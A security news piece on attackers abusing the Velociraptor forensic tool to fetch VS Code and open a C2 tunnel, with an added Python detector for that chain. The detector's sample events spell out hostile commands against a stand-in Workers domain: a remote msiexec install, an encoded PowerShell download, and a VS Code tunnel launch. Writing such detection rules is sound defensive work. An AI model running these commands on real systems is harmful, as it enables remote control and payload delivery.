Attackers Exploit Velociraptor Forensic Tool to Deploy Visual Studio Code for Command-and-Control Tunneling

Cybersecurity researchers have highlighted a recent cyber attack involving the deployment of Velociraptor, an open-source endpoint monitoring and digital forensic tool, by unknown threat actors. This incident exemplifies the ongoing misuse of legitimate software for malicious purposes. According to the Sophos Counter Threat Unit Research Team, the attackers utilised Velociraptor to download and execute Visual Studio Code, likely intending to create a tunnel to an attacker-controlled Command-and-Control (C2) server. The use of Velociraptor indicates a tactical evolution in cyber attacks, where incident response tools are leveraged to gain a foothold, reducing the necessity for deploying custom malware. Further investigation revealed that the attackers employed the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which also served as a staging ground for additional tools, including a Cloudflare tunnelling tool and a remote administration utility known as Radmin.

The MSI file was designed to install Velociraptor, which subsequently established contact with another Cloudflare Workers domain. This access was then exploited to download Visual Studio Code from the same staging server using an encoded PowerShell command, executing the source code editor with the tunnel option enabled for remote access and code execution. The threat actors were also observed using the msiexec utility again to download further payloads from the workers[.]dev folder.

Sophos advised organisations to monitor for and investigate any unauthorised use of Velociraptor, treating such observations as potential precursors to ransomware attacks. Implementing an endpoint detection and response system, monitoring for unexpected tools and suspicious behaviours, and adhering to best practices for system security and backup generation can help mitigate the ransomware threat.

Concurrently, cybersecurity firms Hunters and Permiso reported on a malicious campaign leveraging Microsoft Teams for initial access, showcasing a trend of threat actors weaponising the platform's trusted role in enterprise communications for malware deployment. These attacks typically commence with threat actors using newly created or compromised tenants to send direct messages or initiate calls, impersonating IT help desk teams or other trusted contacts to install remote access software like AnyDesk, DWAgent, or Quick Assist, thereby seizing control of victim systems to deliver malware.
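The chain described above (msiexec installing from a remote URL, Velociraptor running where it was not deployed by the organisation, an encoded PowerShell command, and VS Code started in tunnel mode) is a sequence a detection engineer can look for in process-creation telemetry. The following is an added illustration, not code from the article or from Sophos, that runs such checks over a handful of constructed events. The host names, file paths, allowlist and the `example-staging.workers.dev` domain are all hypothetical; the article names no specific domain.

```python
"""Flag the process-creation pattern from the article over constructed events:
remote msiexec install, unapproved Velociraptor, encoded PowerShell, VS Code tunnel."""
import base64
import re
from collections import defaultdict

# Constructed sample telemetry (hypothetical hosts, paths and domain; not from the article).
WORKERS_DOMAIN = "example-staging.workers.dev"
_DOWNLOAD_CMD = (
    f"Invoke-WebRequest -Uri https://{WORKERS_DOMAIN}/VSCodeSetup.exe "
    r"-OutFile $env:TEMP\VSCodeSetup.exe"
)
# powershell.exe -EncodedCommand expects base64 of the UTF-16LE command text.
ENCODED = base64.b64encode(_DOWNLOAD_CMD.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": f"msiexec.exe /i https://{WORKERS_DOMAIN}/agent.msi /q"},
    {"host": "ws01", "image": r"C:\ProgramData\Velociraptor\velociraptor.exe",
     "cmdline": r"velociraptor.exe --config C:\ProgramData\Velociraptor\client.config.yaml client"},
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"host": "ws01", "image": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\code.exe",
     "cmdline": r'"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\code.exe" tunnel --name ws01'},
    {"host": "ws02", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Temp\7zip.msi /qn"},  # local MSI: expected, not flagged
    {"host": "ws02", "image": r"C:\Program Files\Velociraptor\velociraptor.exe",
     "cmdline": r"velociraptor.exe --config C:\Program Files\Velociraptor\client.config.yaml client"},
]

# Hypothetical allowlist: where the organisation's own Velociraptor client lives.
APPROVED_VELOCIRAPTOR_PATHS = {r"c:\program files\velociraptor\velociraptor.exe"}

# msiexec /i (or /package, /a) given an http(s) URL instead of a local file.
_REMOTE_MSI = re.compile(r"(?:^|\s)[/-](?:i|package|a)\s+\"?https?://", re.I)
# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en[a-z]*)\s+\"?([A-Za-z0-9+/=]+)", re.I)
# VS Code CLI started with the "tunnel" subcommand.
_VSCODE_TUNNEL = re.compile(r"(?:^|\s)tunnel(?:\s|$)", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:
        return None


def analyze(events):
    """Evaluate each event and return findings as (host, rule, detail) tuples."""
    findings = []
    for ev in events:
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd = ev["cmdline"]
        if exe == "msiexec.exe" and _REMOTE_MSI.search(cmd):
            findings.append((ev["host"], "msiexec_remote_install", cmd))
        elif exe == "velociraptor.exe" and ev["image"].lower() not in APPROVED_VELOCIRAPTOR_PATHS:
            findings.append((ev["host"], "velociraptor_unapproved_path", ev["image"]))
        elif exe in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                # Any encoded command deserves a look; note when the decoded text also
                # references a Workers domain or VS Code, which matches the chain above.
                hits = [s for s in ("workers.dev", "vscode", "tunnel") if s in decoded.lower()]
                detail = decoded + (f" [refs: {', '.join(hits)}]" if hits else "")
                findings.append((ev["host"], "powershell_encoded_command", detail))
        elif exe == "code.exe" and _VSCODE_TUNNEL.search(cmd):
            findings.append((ev["host"], "vscode_tunnel", cmd))
    return findings


def score_hosts(findings):
    """Rank hosts: three or more distinct stages of the chain on one host is 'high'."""
    rules = defaultdict(set)
    for host, rule, _ in findings:
        rules[host].add(rule)
    return {h: ("high" if len(r) >= 3 else "medium" if len(r) == 2 else "low")
            for h, r in rules.items()}


if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for host, rule, detail in found:
        print(f"{host}: {rule}: {detail[:80]}")
    print(score_hosts(found))
```

Each rule on its own is noisy (administrators do install MSIs from URLs and run Velociraptor legitimately), which is why the scoring step only escalates a host when several distinct stages of the chain appear together. On a real deployment the allowlist would come from the organisation's own Velociraptor and VS Code inventory rather than a hard-coded set.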

Categories: Cyber Attack Techniques, Use of Legitimate Software for Malicious Purposes, Remote Access Tools 

Tags: Cyber Attack, Velociraptor, Endpoint Monitoring, Command-and-Control, Living-off-the-Land, Remote Monitoring, MSI Installer, PowerShell, Ransomware, Microsoft Teams 
